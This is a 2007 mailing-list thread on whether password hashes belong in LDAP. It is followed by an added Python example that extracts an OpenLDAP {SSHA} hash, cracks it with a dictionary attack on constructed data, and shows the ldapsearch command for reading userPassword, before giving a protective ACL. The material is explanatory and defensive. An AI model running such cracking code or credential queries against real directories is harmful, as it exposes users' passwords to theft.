What's in your LDAP?
Jeff Anderson
jefferya at programmerq.net
Mon Oct 22 17:53:18 MDT 2007
From my humble and limited understanding of LDAP, it in itself isn't too
picky about who can see the data. Having a hashed password in LDAP
enables anyone who can authenticate against LDAP to see the hashed password.
With rainbow tables available, it's a better idea not to have your hashes
public.
That's why a real authentication mechanism, like Kerberos, should be
used. It does not reveal anything about the stored password database
over the network.
Jeff Anderson
Shane Hathaway wrote:
> Michael L Torrie wrote:
>
>> Grant Shipley wrote:
>>
>>> We use Red Hat Directory Server here at Red Hat as the back end of our
>>> SSO implementation. Anytime you log in to redhat.com or RHN, you are
>>> binding via LDAP.
>>>
>> Hmm. This is interesting considering that although everyone does this,
>> but it raises the point that LDAP really is an authorization solution,
>> not an authentication solution. Thus people often say "use LDAP" when
>> they really mean one should use kerberos, or something similar. I'm
>> betting RH is using SASL and kerberos on the back end; I certainly hope
>> my RHN credentials are not stored in LDAP! In the ideal world, there
>> should never be any password information whatsoever stored in LDAP.
>>
>
> Hmm, I'm missing something. Why not? The passwords stored in my LDAP
> database are encrypted, and I'm not using Kerberos; is there something
> wrong with that?
>
> Shane
>
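The exposure Jeff describes, worked through as an added example that is not part of the original thread or any poster's code. OpenLDAP's default access policy, when no access directives are configured, is read for all clients, so a bound (or even anonymous) user can pull userPassword out with a plain ldapsearch. The script below builds a constructed OpenLDAP-style {SSHA} userPassword value (salted SHA-1, the format slappasswd emits by default), parses it the way someone who can read the attribute would, and runs an offline dictionary attack against it. The password, salt and wordlist are made up; the ACL quoted in the comment is standard slapd syntax. One caveat on the rainbow-table point: {SSHA} is salted, so precomputed tables do not apply directly, but a readable hash still permits unlimited offline guessing, which is the real risk.

```python
"""Offline guessing against a readable userPassword attribute.

Added example (not from the original mailing-list post). Assumes the
directory stores {SSHA} values, i.e. base64(sha1(password || salt) || salt).
Sample password, salt and wordlist are constructed for this example.
"""
import base64
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

SHA1_LEN = 20  # SHA-1 digest length in bytes


def ssha_hash(password: str, salt: bytes) -> str:
    """Return an OpenLDAP {SSHA} value for password with the given salt."""
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return "{SSHA}" + base64.b64encode(digest + salt).decode("ascii")


def parse_ssha(value: str) -> Tuple[bytes, bytes]:
    """Split a {SSHA} value into (digest, salt).

    The first 20 bytes are the SHA-1 digest; everything after is the salt
    (OpenLDAP uses 4 bytes, but the scheme allows any length).
    """
    if not value.startswith("{SSHA}"):
        raise ValueError("not an {SSHA} value")
    raw = base64.b64decode(value[len("{SSHA}"):])
    if len(raw) <= SHA1_LEN:
        raise ValueError("truncated {SSHA} value: no salt present")
    return raw[:SHA1_LEN], raw[SHA1_LEN:]


def verify_ssha(value: str, candidate: str) -> bool:
    """Check one candidate password against a {SSHA} value."""
    digest, salt = parse_ssha(value)
    guess = hashlib.sha1(candidate.encode("utf-8") + salt).digest()
    return hmac.compare_digest(guess, digest)


def crack_ssha(value: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first word that matches, else None.

    This is exactly what a readable userPassword hands an attacker: the salt
    defeats rainbow tables, but not an offline wordlist run at full speed.
    """
    for word in wordlist:
        if verify_ssha(value, word):
            return word
    return None


# Constructed sample: what an ordinary bound user sees from, for example,
#   ldapsearch -x -D "uid=alice,ou=people,dc=example,dc=com" -W \
#       -b "dc=example,dc=com" userPassword
# when the ACL (or the absence of one) lets authenticated users read it.
SAMPLE_SALT = b"\x01\x02\x03\x04"          # fixed so the output is reproducible
SAMPLE_USERPASSWORD = ssha_hash("hunter2", SAMPLE_SALT)  # constructed entry
WORDLIST = ["password", "letmein", "hunter2", "qwerty"]  # constructed wordlist

# The slapd ACL that closes the hole (slapd.conf form; olcAccess in cn=config).
# "auth" lets a simple bind compare against the attribute without reading it
# back; nobody except the entry itself can retrieve the hash.
OPENLDAP_USERPASSWORD_ACL = (
    "access to attrs=userPassword\n"
    "    by self write\n"
    "    by anonymous auth\n"
    "    by * none"
)

if __name__ == "__main__":
    print("userPassword:", SAMPLE_USERPASSWORD)
    print("cracked:", crack_ssha(SAMPLE_USERPASSWORD, WORDLIST))
    print(OPENLDAP_USERPASSWORD_ACL)
```

Running it prints the constructed hash, recovers "hunter2" from the four-word list, and then prints the ACL. Kerberos avoids the whole problem because the KDC never sends anything derived from the stored key over the wire to an LDAP client; with LDAP-stored hashes, the ACL is the only thing between a bound user and an offline attack.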